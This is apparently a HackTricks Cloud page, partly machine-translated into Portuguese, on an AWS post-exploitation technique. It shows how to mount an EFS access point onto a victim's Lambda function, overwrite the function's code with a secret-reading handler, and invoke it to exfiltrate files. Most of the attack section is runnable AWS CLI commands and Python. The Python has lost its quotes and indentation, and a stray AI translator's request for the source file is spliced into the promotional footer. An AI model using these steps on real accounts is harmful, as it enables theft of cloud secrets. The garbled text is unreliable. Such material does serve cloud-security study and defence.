AWS Lambda – EFS Mount Injection via UpdateFunctionConfiguration (Data Theft)

Reading time: 4 minutes

Abuse lambda:UpdateFunctionConfiguration para anexar um EFS Access Point existente a uma Lambda, então implante código trivial que lista/lê arquivos do caminho montado para exfiltrate shared secrets/config que a função anteriormente não podia acessar.

Requisitos

• Permissões na conta/principal da vítima:
• lambda:GetFunctionConfiguration
• lambda:ListFunctions (to find functions)
• lambda:UpdateFunctionConfiguration
• lambda:UpdateFunctionCode
• lambda:InvokeFunction
• efs:DescribeMountTargets (to confirm mount targets exist)
• Pressupostos do ambiente:
• Target Lambda is VPC-enabled and its subnets/SGs can reach the EFS mount target SG over TCP/2049 (e.g. role has AWSLambdaVPCAccessExecutionRole and VPC routing allows it).
• The EFS Access Point is in the same VPC and has mount targets in the AZs of the Lambda subnets.

Ataque

• Variáveis

REGION=us-east-1
TARGET_FN=<target-lambda-name>
EFS_AP_ARN=<efs-access-point-arn>

1. Anexar o EFS Access Point à Lambda

aws lambda update-function-configuration \
--function-name $TARGET_FN \
--file-system-configs Arn=$EFS_AP_ARN,LocalMountPath=/mnt/ht \
--region $REGION
# wait until LastUpdateStatus == Successful
until [ "$(aws lambda get-function-configuration --function-name $TARGET_FN --query LastUpdateStatus --output text --region $REGION)" = "Successful" ]; do sleep 2; done

2. Sobrescrever code com um leitor simples que lista arquivos e visualiza os primeiros 200 bytes de um arquivo candidato a conter segredos/configurações

cat > reader.py <<PY
import os, json
BASE=/mnt/ht

def lambda_handler(e, c):
out={ls:[],peek:None}
try:
for root, dirs, files in os.walk(BASE):
for f in files:
p=os.path.join(root,f)
out[ls].append(p)
cand = next((p for p in out[ls] if secret in p.lower() or config in p.lower()), None)
if cand:
with open(cand,rb) as fh:
out[peek] = fh.read(200).decode(utf-8,ignore)
except Exception as ex:
out[err]=str(ex)
return out
PY
zip reader.zip reader.py
aws lambda update-function-code --function-name $TARGET_FN --zip-file fileb://reader.zip --region $REGION
# If the original handler was different, set it to reader.lambda_handler
aws lambda update-function-configuration --function-name $TARGET_FN --handler reader.lambda_handler --region $REGION
until [ "$(aws lambda get-function-configuration --function-name $TARGET_FN --query LastUpdateStatus --output text --region $REGION)" = "Successful" ]; do sleep 2; done

3. Invocar e obter os dados

aws lambda invoke --function-name $TARGET_FN /tmp/efs-out.json --region $REGION >/dev/null
cat /tmp/efs-out.json

A saída deve conter a listagem do diretório em /mnt/ht e uma pequena pré-visualização de um secret/config file escolhido do EFS.

Impacto

Um atacante com as permissões listadas pode montar Access Points arbitrários in-VPC do EFS em funções Lambda da vítima para ler e exfiltrar configurações compartilhadas e secrets armazenados no EFS que anteriormente eram inacessíveis para essa função.

Limpeza

aws lambda update-function-configuration --function-name $TARGET_FN --file-system-configs [] --region $REGION || true

Não tenho acesso direto ao arquivo no repositório. Por favor cole aqui o conteúdo de src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-efs-mount-injection.md (ou confirme que quer que eu traduza o conteúdo incluído por > [!TIP]

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Confira os planos de assinatura!
• Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
• Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.

). Vou traduzir para Português mantendo intactos markdown, tags, paths, código e links conforme solicitado.